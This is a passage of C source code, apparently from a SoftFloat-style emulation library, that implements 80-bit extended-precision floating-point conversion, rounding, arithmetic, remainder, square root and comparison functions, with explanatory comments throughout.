*----------------------------------------------------------------------------*/ int64_t floatx80_to_int64(floatx80 a, float_status *status) { flag aSign; int32_t aExp, shiftCount; uint64_t aSig, aSigExtra; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return 1ULL << 63; } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); shiftCount = 0x403E - aExp; if ( shiftCount <= 0 ) { if ( shiftCount ) { float_raise(float_flag_invalid, status); if (!aSign || floatx80_is_any_nan(a)) { return INT64_MAX; } return INT64_MIN; } aSigExtra = 0; } else { shift64ExtraRightJamming( aSig, 0, shiftCount, &aSig, &aSigExtra ); } return roundAndPackInt64(aSign, aSig, aSigExtra, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the 64-bit two's complement integer format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic, except that the conversion is always rounded | toward zero. If `a' is a NaN, the largest positive integer is returned. | Otherwise, if the conversion overflows, the largest integer with the same | sign as `a' is returned. *----------------------------------------------------------------------------*/ int64_t floatx80_to_int64_round_to_zero(floatx80 a, float_status *status) { flag aSign; int32_t aExp, shiftCount; uint64_t aSig; int64_t z; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return 1ULL << 63; } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); shiftCount = aExp - 0x403E; if ( 0 <= shiftCount ) { aSig &= UINT64_C(0x7FFFFFFFFFFFFFFF); if ( ( a.high != 0xC03E ) || aSig ) { float_raise(float_flag_invalid, status); if ( ! aSign || ( ( aExp == 0x7FFF ) && aSig ) ) { return INT64_MAX; } } return INT64_MIN; } else if ( aExp < 0x3FFF ) { if (aExp | aSig) { status->float_exception_flags |= float_flag_inexact; } return 0; } z = aSig>>( - shiftCount ); if ( (uint64_t) ( aSig<<( shiftCount & 63 ) ) ) { status->float_exception_flags |= float_flag_inexact; } if ( aSign ) z = - z; return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the single-precision floating-point format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float32 floatx80_to_float32(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return float32_default_nan(status); } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); if ( aExp == 0x7FFF ) { if ( (uint64_t) ( aSig<<1 ) ) { return commonNaNToFloat32(floatx80ToCommonNaN(a, status), status); } return packFloat32( aSign, 0xFF, 0 ); } shift64RightJamming( aSig, 33, &aSig ); if ( aExp || aSig ) aExp -= 0x3F81; return roundAndPackFloat32(aSign, aExp, aSig, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the double-precision floating-point format. 
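| (Illustrative note: the 64-bit significand carries an explicit integer
| bit, so it is shifted right by one - the displaced bit jammed - to put the
| leading 1 at bit 62 where roundAndPackFloat64 expects it; the matching
| exponent adjustment is 0x3C01 = (0x3FFF - 0x3FF) + 1.)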
The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float64 floatx80_to_float64(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig, zSig; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return float64_default_nan(status); } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); if ( aExp == 0x7FFF ) { if ( (uint64_t) ( aSig<<1 ) ) { return commonNaNToFloat64(floatx80ToCommonNaN(a, status), status); } return packFloat64( aSign, 0x7FF, 0 ); } shift64RightJamming( aSig, 1, &zSig ); if ( aExp || aSig ) aExp -= 0x3C01; return roundAndPackFloat64(aSign, aExp, zSig, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the quadruple-precision floating-point format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 floatx80_to_float128(floatx80 a, float_status *status) { flag aSign; int aExp; uint64_t aSig, zSig0, zSig1; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return float128_default_nan(status); } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); if ( ( aExp == 0x7FFF ) && (uint64_t) ( aSig<<1 ) ) { return commonNaNToFloat128(floatx80ToCommonNaN(a, status), status); } shift128Right( aSig<<1, 0, 16, &zSig0, &zSig1 ); return packFloat128( aSign, aExp, zSig0, zSig1 ); } /*---------------------------------------------------------------------------- | Rounds the extended double-precision floating-point value `a' | to the precision provided by floatx80_rounding_precision and returns the | result as an extended double-precision floating-point value. | The operation is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 floatx80_round(floatx80 a, float_status *status) { return roundAndPackFloatx80(status->floatx80_rounding_precision, extractFloatx80Sign(a), extractFloatx80Exp(a), extractFloatx80Frac(a), 0, status); } /*---------------------------------------------------------------------------- | Rounds the extended double-precision floating-point value `a' to an integer, | and returns the result as an extended double-precision floating-point | value. The operation is performed according to the IEC/IEEE Standard for | Binary Floating-Point Arithmetic.
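| (Worked example: rounding 2.5 yields 2.0 under round-to-nearest-even but
| 3.0 under ties-away; nonzero inputs of magnitude below 1 collapse to 0 or
| to +/-1 according to the rounding mode, and the inexact flag is set
| whenever the result differs from the input.)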
/*----------------------------------------------------------------------------
| Rounds the extended double-precision floating-point value `a' to an integer,
| and returns the result as an extended double-precision floating-point
| value.  The operation is performed according to the IEC/IEEE Standard for
| Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

floatx80 floatx80_round_to_int(floatx80 a, float_status *status)
{
    flag aSign;
    int32_t aExp;
    uint64_t lastBitMask, roundBitsMask;
    floatx80 z;

    if (floatx80_invalid_encoding(a)) {
        float_raise(float_flag_invalid, status);
        return floatx80_default_nan(status);
    }
    aExp = extractFloatx80Exp( a );
    if ( 0x403E <= aExp ) {
        if (    ( aExp == 0x7FFF )
             && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) {
            return propagateFloatx80NaN(a, a, status);
        }
        return a;
    }
    if ( aExp < 0x3FFF ) {
        if (    ( aExp == 0 )
             && ( (uint64_t) ( extractFloatx80Frac( a )<<1 ) == 0 ) ) {
            return a;
        }
        status->float_exception_flags |= float_flag_inexact;
        aSign = extractFloatx80Sign( a );
        switch (status->float_rounding_mode) {
        case float_round_nearest_even:
            if (    ( aExp == 0x3FFE )
                 && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) {
                return packFloatx80( aSign, 0x3FFF,
                                     UINT64_C(0x8000000000000000));
            }
            break;
        case float_round_ties_away:
            if (aExp == 0x3FFE) {
                return packFloatx80(aSign, 0x3FFF,
                                    UINT64_C(0x8000000000000000));
            }
            break;
        case float_round_down:
            return aSign ?
                packFloatx80( 1, 0x3FFF, UINT64_C(0x8000000000000000))
                : packFloatx80( 0, 0, 0 );
        case float_round_up:
            return aSign ?
                packFloatx80( 1, 0, 0 )
                : packFloatx80( 0, 0x3FFF, UINT64_C(0x8000000000000000));
        }
        return packFloatx80( aSign, 0, 0 );
    }
    lastBitMask = 1;
    lastBitMask <<= 0x403E - aExp;
    roundBitsMask = lastBitMask - 1;
    z = a;
    switch (status->float_rounding_mode) {
    case float_round_nearest_even:
        z.low += lastBitMask>>1;
        if ((z.low & roundBitsMask) == 0) {
            z.low &= ~lastBitMask;
        }
        break;
    case float_round_ties_away:
        z.low += lastBitMask >> 1;
        break;
    case float_round_to_zero:
        break;
    case float_round_up:
        if (!extractFloatx80Sign(z)) {
            z.low += roundBitsMask;
        }
        break;
    case float_round_down:
        if (extractFloatx80Sign(z)) {
            z.low += roundBitsMask;
        }
        break;
    default:
        abort();
    }
    z.low &= ~ roundBitsMask;
    if ( z.low == 0 ) {
        ++z.high;
        z.low = UINT64_C(0x8000000000000000);
    }
    if (z.low != a.low) {
        status->float_exception_flags |= float_flag_inexact;
    }
    return z;
}
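/*----------------------------------------------------------------------------
| Editor's note (illustrative): for 0x3FFF <= aExp < 0x403E the code above
| rounds by arithmetic on the significand alone.  With aExp = 0x4000 (a value
| in [4,8)), lastBitMask = 1 << (0x403E - 0x4000) = 1 << 62, so the integer
| part occupies the bits above bit 62 and roundBitsMask selects the discarded
| fraction.  Adding lastBitMask>>1 and then clearing roundBitsMask implements
| round-to-nearest, with the clearing of lastBitMask supplying the ties-to-
| even fixup when the fraction was exactly one half.
*----------------------------------------------------------------------------*/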
/*----------------------------------------------------------------------------
| Returns the result of adding the absolute values of the extended double-
| precision floating-point values `a' and `b'.  If `zSign' is 1, the sum is
| negated before being returned.  `zSign' is ignored if the result is a NaN.
| The addition is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

static floatx80 addFloatx80Sigs(floatx80 a, floatx80 b, flag zSign,
                                float_status *status)
{
    int32_t aExp, bExp, zExp;
    uint64_t aSig, bSig, zSig0, zSig1;
    int32_t expDiff;

    aSig = extractFloatx80Frac( a );
    aExp = extractFloatx80Exp( a );
    bSig = extractFloatx80Frac( b );
    bExp = extractFloatx80Exp( b );
    expDiff = aExp - bExp;
    if ( 0 < expDiff ) {
        if ( aExp == 0x7FFF ) {
            if ((uint64_t)(aSig << 1)) {
                return propagateFloatx80NaN(a, b, status);
            }
            return a;
        }
        if ( bExp == 0 ) --expDiff;
        shift64ExtraRightJamming( bSig, 0, expDiff, &bSig, &zSig1 );
        zExp = aExp;
    }
    else if ( expDiff < 0 ) {
        if ( bExp == 0x7FFF ) {
            if ((uint64_t)(bSig << 1)) {
                return propagateFloatx80NaN(a, b, status);
            }
            return packFloatx80(zSign,
                                floatx80_infinity_high,
                                floatx80_infinity_low);
        }
        if ( aExp == 0 ) ++expDiff;
        shift64ExtraRightJamming( aSig, 0, - expDiff, &aSig, &zSig1 );
        zExp = bExp;
    }
    else {
        if ( aExp == 0x7FFF ) {
            if ( (uint64_t) ( ( aSig | bSig )<<1 ) ) {
                return propagateFloatx80NaN(a, b, status);
            }
            return a;
        }
        zSig1 = 0;
        zSig0 = aSig + bSig;
        if ( aExp == 0 ) {
            if (zSig0 == 0) {
                return packFloatx80(zSign, 0, 0);
            }
            normalizeFloatx80Subnormal( zSig0, &zExp, &zSig0 );
            goto roundAndPack;
        }
        zExp = aExp;
        goto shiftRight1;
    }
    zSig0 = aSig + bSig;
    if ( (int64_t) zSig0 < 0 ) goto roundAndPack;
 shiftRight1:
    shift64ExtraRightJamming( zSig0, zSig1, 1, &zSig0, &zSig1 );
    zSig0 |= UINT64_C(0x8000000000000000);
    ++zExp;
 roundAndPack:
    return roundAndPackFloatx80(status->floatx80_rounding_precision,
                                zSign, zExp, zSig0, zSig1, status);
}
/*----------------------------------------------------------------------------
| Returns the result of subtracting the absolute values of the extended
| double-precision floating-point values `a' and `b'.  If `zSign' is 1, the
| difference is negated before being returned.  `zSign' is ignored if the
| result is a NaN.  The subtraction is performed according to the IEC/IEEE
| Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

static floatx80 subFloatx80Sigs(floatx80 a, floatx80 b, flag zSign,
                                float_status *status)
{
    int32_t aExp, bExp, zExp;
    uint64_t aSig, bSig, zSig0, zSig1;
    int32_t expDiff;

    aSig = extractFloatx80Frac( a );
    aExp = extractFloatx80Exp( a );
    bSig = extractFloatx80Frac( b );
    bExp = extractFloatx80Exp( b );
    expDiff = aExp - bExp;
    if ( 0 < expDiff ) goto aExpBigger;
    if ( expDiff < 0 ) goto bExpBigger;
    if ( aExp == 0x7FFF ) {
        if ( (uint64_t) ( ( aSig | bSig )<<1 ) ) {
            return propagateFloatx80NaN(a, b, status);
        }
        float_raise(float_flag_invalid, status);
        return floatx80_default_nan(status);
    }
    if ( aExp == 0 ) {
        aExp = 1;
        bExp = 1;
    }
    zSig1 = 0;
    if ( bSig < aSig ) goto aBigger;
    if ( aSig < bSig ) goto bBigger;
    return packFloatx80(status->float_rounding_mode == float_round_down, 0, 0);
 bExpBigger:
    if ( bExp == 0x7FFF ) {
        if ((uint64_t)(bSig << 1)) {
            return propagateFloatx80NaN(a, b, status);
        }
        return packFloatx80(zSign ^ 1, floatx80_infinity_high,
                            floatx80_infinity_low);
    }
    if ( aExp == 0 ) ++expDiff;
    shift128RightJamming( aSig, 0, - expDiff, &aSig, &zSig1 );
 bBigger:
    sub128( bSig, 0, aSig, zSig1, &zSig0, &zSig1 );
    zExp = bExp;
    zSign ^= 1;
    goto normalizeRoundAndPack;
 aExpBigger:
    if ( aExp == 0x7FFF ) {
        if ((uint64_t)(aSig << 1)) {
            return propagateFloatx80NaN(a, b, status);
        }
        return a;
    }
    if ( bExp == 0 ) --expDiff;
    shift128RightJamming( bSig, 0, expDiff, &bSig, &zSig1 );
 aBigger:
    sub128( aSig, 0, bSig, zSig1, &zSig0, &zSig1 );
    zExp = aExp;
 normalizeRoundAndPack:
    return normalizeRoundAndPackFloatx80(status->floatx80_rounding_precision,
                                         zSign, zExp, zSig0, zSig1, status);
}

/*----------------------------------------------------------------------------
| Returns the result of adding the extended double-precision floating-point
| values `a' and `b'.  The operation is performed according to the IEC/IEEE
| Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

floatx80 floatx80_add(floatx80 a, floatx80 b, float_status *status)
{
    flag aSign, bSign;

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid, status);
        return floatx80_default_nan(status);
    }
    aSign = extractFloatx80Sign( a );
    bSign = extractFloatx80Sign( b );
    if ( aSign == bSign ) {
        return addFloatx80Sigs(a, b, aSign, status);
    }
    else {
        return subFloatx80Sigs(a, b, aSign, status);
    }
}

/*----------------------------------------------------------------------------
| Returns the result of subtracting the extended double-precision floating-
| point values `a' and `b'.  The operation is performed according to the
| IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

floatx80 floatx80_sub(floatx80 a, floatx80 b, float_status *status)
{
    flag aSign, bSign;

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid, status);
        return floatx80_default_nan(status);
    }
    aSign = extractFloatx80Sign( a );
    bSign = extractFloatx80Sign( b );
    if ( aSign == bSign ) {
        return subFloatx80Sigs(a, b, aSign, status);
    }
    else {
        return addFloatx80Sigs(a, b, aSign, status);
    }
}
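/*----------------------------------------------------------------------------
| Editor's note (illustrative): floatx80_add() and floatx80_sub() reduce both
| operations to magnitude arithmetic.  Same signs add magnitudes, opposite
| signs subtract them, so for example (-3) + (+5) is computed as the
| magnitude difference 5 - 3, with the result sign resolved inside
| subFloatx80Sigs().
*----------------------------------------------------------------------------*/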
/*----------------------------------------------------------------------------
| Returns the result of multiplying the extended double-precision floating-
| point values `a' and `b'.  The operation is performed according to the
| IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

floatx80 floatx80_mul(floatx80 a, floatx80 b, float_status *status)
{
    flag aSign, bSign, zSign;
    int32_t aExp, bExp, zExp;
    uint64_t aSig, bSig, zSig0, zSig1;

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid, status);
        return floatx80_default_nan(status);
    }
    aSig = extractFloatx80Frac( a );
    aExp = extractFloatx80Exp( a );
    aSign = extractFloatx80Sign( a );
    bSig = extractFloatx80Frac( b );
    bExp = extractFloatx80Exp( b );
    bSign = extractFloatx80Sign( b );
    zSign = aSign ^ bSign;
    if ( aExp == 0x7FFF ) {
        if (    (uint64_t) ( aSig<<1 )
             || ( ( bExp == 0x7FFF ) && (uint64_t) ( bSig<<1 ) ) ) {
            return propagateFloatx80NaN(a, b, status);
        }
        if ( ( bExp | bSig ) == 0 ) goto invalid;
        return packFloatx80(zSign, floatx80_infinity_high,
                            floatx80_infinity_low);
    }
    if ( bExp == 0x7FFF ) {
        if ((uint64_t)(bSig << 1)) {
            return propagateFloatx80NaN(a, b, status);
        }
        if ( ( aExp | aSig ) == 0 ) {
 invalid:
            float_raise(float_flag_invalid, status);
            return floatx80_default_nan(status);
        }
        return packFloatx80(zSign, floatx80_infinity_high,
                            floatx80_infinity_low);
    }
    if ( aExp == 0 ) {
        if ( aSig == 0 ) return packFloatx80( zSign, 0, 0 );
        normalizeFloatx80Subnormal( aSig, &aExp, &aSig );
    }
    if ( bExp == 0 ) {
        if ( bSig == 0 ) return packFloatx80( zSign, 0, 0 );
        normalizeFloatx80Subnormal( bSig, &bExp, &bSig );
    }
    zExp = aExp + bExp - 0x3FFE;
    mul64To128( aSig, bSig, &zSig0, &zSig1 );
    if ( 0 < (int64_t) zSig0 ) {
        shortShift128Left( zSig0, zSig1, 1, &zSig0, &zSig1 );
        --zExp;
    }
    return roundAndPackFloatx80(status->floatx80_rounding_precision,
                                zSign, zExp, zSig0, zSig1, status);
}
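/*----------------------------------------------------------------------------
| Editor's note (illustrative): in floatx80_mul() the biased exponents add,
| so one bias must be removed; zExp = aExp + bExp - 0x3FFE rather than
| - 0x3FFF because mul64To128() of two normalized significands in
| [2^63, 2^64) yields a product in [2^126, 2^128), i.e. possibly one binary
| place past the target position, and the shortShift128Left()/--zExp step
| compensates when the top product bit is clear.
*----------------------------------------------------------------------------*/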
/*----------------------------------------------------------------------------
| Returns the result of dividing the extended double-precision floating-point
| value `a' by the corresponding value `b'.  The operation is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

floatx80 floatx80_div(floatx80 a, floatx80 b, float_status *status)
{
    flag aSign, bSign, zSign;
    int32_t aExp, bExp, zExp;
    uint64_t aSig, bSig, zSig0, zSig1;
    uint64_t rem0, rem1, rem2, term0, term1, term2;

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid, status);
        return floatx80_default_nan(status);
    }
    aSig = extractFloatx80Frac( a );
    aExp = extractFloatx80Exp( a );
    aSign = extractFloatx80Sign( a );
    bSig = extractFloatx80Frac( b );
    bExp = extractFloatx80Exp( b );
    bSign = extractFloatx80Sign( b );
    zSign = aSign ^ bSign;
    if ( aExp == 0x7FFF ) {
        if ((uint64_t)(aSig << 1)) {
            return propagateFloatx80NaN(a, b, status);
        }
        if ( bExp == 0x7FFF ) {
            if ((uint64_t)(bSig << 1)) {
                return propagateFloatx80NaN(a, b, status);
            }
            goto invalid;
        }
        return packFloatx80(zSign, floatx80_infinity_high,
                            floatx80_infinity_low);
    }
    if ( bExp == 0x7FFF ) {
        if ((uint64_t)(bSig << 1)) {
            return propagateFloatx80NaN(a, b, status);
        }
        return packFloatx80( zSign, 0, 0 );
    }
    if ( bExp == 0 ) {
        if ( bSig == 0 ) {
            if ( ( aExp | aSig ) == 0 ) {
 invalid:
                float_raise(float_flag_invalid, status);
                return floatx80_default_nan(status);
            }
            float_raise(float_flag_divbyzero, status);
            return packFloatx80(zSign, floatx80_infinity_high,
                                floatx80_infinity_low);
        }
        normalizeFloatx80Subnormal( bSig, &bExp, &bSig );
    }
    if ( aExp == 0 ) {
        if ( aSig == 0 ) return packFloatx80( zSign, 0, 0 );
        normalizeFloatx80Subnormal( aSig, &aExp, &aSig );
    }
    zExp = aExp - bExp + 0x3FFE;
    rem1 = 0;
    if ( bSig <= aSig ) {
        shift128Right( aSig, 0, 1, &aSig, &rem1 );
        ++zExp;
    }
    zSig0 = estimateDiv128To64( aSig, rem1, bSig );
    mul64To128( bSig, zSig0, &term0, &term1 );
    sub128( aSig, rem1, term0, term1, &rem0, &rem1 );
    while ( (int64_t) rem0 < 0 ) {
        --zSig0;
        add128( rem0, rem1, 0, bSig, &rem0, &rem1 );
    }
    zSig1 = estimateDiv128To64( rem1, 0, bSig );
    if ( (uint64_t) ( zSig1<<1 ) <= 8 ) {
        mul64To128( bSig, zSig1, &term1, &term2 );
        sub128( rem1, 0, term1, term2, &rem1, &rem2 );
        while ( (int64_t) rem1 < 0 ) {
            --zSig1;
            add128( rem1, rem2, 0, bSig, &rem1, &rem2 );
        }
        zSig1 |= ( ( rem1 | rem2 ) != 0 );
    }
    return roundAndPackFloatx80(status->floatx80_rounding_precision,
                                zSign, zExp, zSig0, zSig1, status);
}
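/*----------------------------------------------------------------------------
| Editor's note (illustrative): floatx80_div() forms the quotient 64 bits at
| a time with estimateDiv128To64(), corrects each estimate downward while the
| partial remainder is negative, and finally ORs any nonzero remainder into
| the low quotient bit (the "sticky" bit) so that roundAndPackFloatx80() can
| round the result correctly in every rounding mode.
*----------------------------------------------------------------------------*/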
/*----------------------------------------------------------------------------
| Returns the remainder of the extended double-precision floating-point value
| `a' with respect to the corresponding value `b'.  The operation is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

floatx80 floatx80_rem(floatx80 a, floatx80 b, float_status *status)
{
    flag aSign, zSign;
    int32_t aExp, bExp, expDiff;
    uint64_t aSig0, aSig1, bSig;
    uint64_t q, term0, term1, alternateASig0, alternateASig1;

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid, status);
        return floatx80_default_nan(status);
    }
    aSig0 = extractFloatx80Frac( a );
    aExp = extractFloatx80Exp( a );
    aSign = extractFloatx80Sign( a );
    bSig = extractFloatx80Frac( b );
    bExp = extractFloatx80Exp( b );
    if ( aExp == 0x7FFF ) {
        if (    (uint64_t) ( aSig0<<1 )
             || ( ( bExp == 0x7FFF ) && (uint64_t) ( bSig<<1 ) ) ) {
            return propagateFloatx80NaN(a, b, status);
        }
        goto invalid;
    }
    if ( bExp == 0x7FFF ) {
        if ((uint64_t)(bSig << 1)) {
            return propagateFloatx80NaN(a, b, status);
        }
        return a;
    }
    if ( bExp == 0 ) {
        if ( bSig == 0 ) {
 invalid:
            float_raise(float_flag_invalid, status);
            return floatx80_default_nan(status);
        }
        normalizeFloatx80Subnormal( bSig, &bExp, &bSig );
    }
    if ( aExp == 0 ) {
        if ( (uint64_t) ( aSig0<<1 ) == 0 ) return a;
        normalizeFloatx80Subnormal( aSig0, &aExp, &aSig0 );
    }
    bSig |= UINT64_C(0x8000000000000000);
    zSign = aSign;
    expDiff = aExp - bExp;
    aSig1 = 0;
    if ( expDiff < 0 ) {
        if ( expDiff < -1 ) return a;
        shift128Right( aSig0, 0, 1, &aSig0, &aSig1 );
        expDiff = 0;
    }
    q = ( bSig <= aSig0 );
    if ( q ) aSig0 -= bSig;
    expDiff -= 64;
    while ( 0 < expDiff ) {
        q = estimateDiv128To64( aSig0, aSig1, bSig );
        q = ( 2 < q ) ? q - 2 : 0;
        mul64To128( bSig, q, &term0, &term1 );
        sub128( aSig0, aSig1, term0, term1, &aSig0, &aSig1 );
        shortShift128Left( aSig0, aSig1, 62, &aSig0, &aSig1 );
        expDiff -= 62;
    }
    expDiff += 64;
    if ( 0 < expDiff ) {
        q = estimateDiv128To64( aSig0, aSig1, bSig );
        q = ( 2 < q ) ? q - 2 : 0;
        q >>= 64 - expDiff;
        mul64To128( bSig, q<<( 64 - expDiff ), &term0, &term1 );
        sub128( aSig0, aSig1, term0, term1, &aSig0, &aSig1 );
        shortShift128Left( 0, bSig, 64 - expDiff, &term0, &term1 );
        while ( le128( term0, term1, aSig0, aSig1 ) ) {
            ++q;
            sub128( aSig0, aSig1, term0, term1, &aSig0, &aSig1 );
        }
    }
    else {
        term1 = 0;
        term0 = bSig;
    }
    sub128( term0, term1, aSig0, aSig1, &alternateASig0, &alternateASig1 );
    if (    lt128( alternateASig0, alternateASig1, aSig0, aSig1 )
         || (    eq128( alternateASig0, alternateASig1, aSig0, aSig1 )
              && ( q & 1 ) )
       ) {
        aSig0 = alternateASig0;
        aSig1 = alternateASig1;
        zSign = ! zSign;
    }
    return
        normalizeRoundAndPackFloatx80(
            80, zSign, bExp + expDiff, aSig0, aSig1, status);
}
/*----------------------------------------------------------------------------
| Returns the square root of the extended double-precision floating-point
| value `a'.  The operation is performed according to the IEC/IEEE Standard
| for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

floatx80 floatx80_sqrt(floatx80 a, float_status *status)
{
    flag aSign;
    int32_t aExp, zExp;
    uint64_t aSig0, aSig1, zSig0, zSig1, doubleZSig0;
    uint64_t rem0, rem1, rem2, rem3, term0, term1, term2, term3;

    if (floatx80_invalid_encoding(a)) {
        float_raise(float_flag_invalid, status);
        return floatx80_default_nan(status);
    }
    aSig0 = extractFloatx80Frac( a );
    aExp = extractFloatx80Exp( a );
    aSign = extractFloatx80Sign( a );
    if ( aExp == 0x7FFF ) {
        if ((uint64_t)(aSig0 << 1)) {
            return propagateFloatx80NaN(a, a, status);
        }
        if ( ! aSign ) return a;
        goto invalid;
    }
    if ( aSign ) {
        if ( ( aExp | aSig0 ) == 0 ) return a;
 invalid:
        float_raise(float_flag_invalid, status);
        return floatx80_default_nan(status);
    }
    if ( aExp == 0 ) {
        if ( aSig0 == 0 ) return packFloatx80( 0, 0, 0 );
        normalizeFloatx80Subnormal( aSig0, &aExp, &aSig0 );
    }
    zExp = ( ( aExp - 0x3FFF )>>1 ) + 0x3FFF;
    zSig0 = estimateSqrt32( aExp, aSig0>>32 );
    shift128Right( aSig0, 0, 2 + ( aExp & 1 ), &aSig0, &aSig1 );
    zSig0 = estimateDiv128To64( aSig0, aSig1, zSig0<<32 ) + ( zSig0<<30 );
    doubleZSig0 = zSig0<<1;
    mul64To128( zSig0, zSig0, &term0, &term1 );
    sub128( aSig0, aSig1, term0, term1, &rem0, &rem1 );
    while ( (int64_t) rem0 < 0 ) {
        --zSig0;
        doubleZSig0 -= 2;
        add128( rem0, rem1, zSig0>>63, doubleZSig0 | 1, &rem0, &rem1 );
    }
    zSig1 = estimateDiv128To64( rem1, 0, doubleZSig0 );
    if ( ( zSig1 & UINT64_C(0x3FFFFFFFFFFFFFFF) ) <= 5 ) {
        if ( zSig1 == 0 ) zSig1 = 1;
        mul64To128( doubleZSig0, zSig1, &term1, &term2 );
        sub128( rem1, 0, term1, term2, &rem1, &rem2 );
        mul64To128( zSig1, zSig1, &term2, &term3 );
        sub192( rem1, rem2, 0, 0, term2, term3, &rem1, &rem2, &rem3 );
        while ( (int64_t) rem1 < 0 ) {
            --zSig1;
            shortShift128Left( 0, zSig1, 1, &term2, &term3 );
            term3 |= 1;
            term2 |= doubleZSig0;
            add192( rem1, rem2, rem3, 0, term2, term3, &rem1, &rem2, &rem3 );
        }
        zSig1 |= ( ( rem1 | rem2 | rem3 ) != 0 );
    }
    shortShift128Left( 0, zSig1, 1, &zSig0, &zSig1 );
    zSig0 |= doubleZSig0;
    return roundAndPackFloatx80(status->floatx80_rounding_precision,
                                0, zExp, zSig0, zSig1, status);
}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point value `a' is equal
| to the corresponding value `b', and 0 otherwise.  The invalid exception is
| raised if either operand is a NaN.  Otherwise, the comparison is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_eq(floatx80 a, floatx80 b, float_status *status)
{
    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)
        || (extractFloatx80Exp(a) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(a) << 1))
        || (extractFloatx80Exp(b) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(b) << 1))
       ) {
        float_raise(float_flag_invalid, status);
        return 0;
    }
    return
           ( a.low == b.low )
        && (    ( a.high == b.high )
             || (    ( a.low == 0 )
                  && ( (uint16_t) ( ( a.high | b.high )<<1 ) == 0 ) )
           );
}
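/*----------------------------------------------------------------------------
| Editor's note (illustrative): the equality test above treats +0 and -0 as
| equal.  When a.low == b.low == 0, the expression
| (uint16_t) ( ( a.high | b.high )<<1 ) shifts the sign bit out of the
| combined sign/exponent fields, so two zeros compare equal regardless of
| their signs.
*----------------------------------------------------------------------------*/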
/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point value `a' is
| less than or equal to the corresponding value `b', and 0 otherwise.  The
| invalid exception is raised if either operand is a NaN.  The comparison is
| performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_le(floatx80 a, floatx80 b, float_status *status)
{
    flag aSign, bSign;

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)
        || (extractFloatx80Exp(a) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(a) << 1))
        || (extractFloatx80Exp(b) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(b) << 1))
       ) {
        float_raise(float_flag_invalid, status);
        return 0;
    }
    aSign = extractFloatx80Sign( a );
    bSign = extractFloatx80Sign( b );
    if ( aSign != bSign ) {
        return
               aSign
            || (    ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low )
                 == 0 );
    }
    return
          aSign ? le128( b.high, b.low, a.high, a.low )
        : le128( a.high, a.low, b.high, b.low );
}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point value `a' is
| less than the corresponding value `b', and 0 otherwise.  The invalid
| exception is raised if either operand is a NaN.  The comparison is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_lt(floatx80 a, floatx80 b, float_status *status)
{
    flag aSign, bSign;

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)
        || (extractFloatx80Exp(a) == 0x7FFF
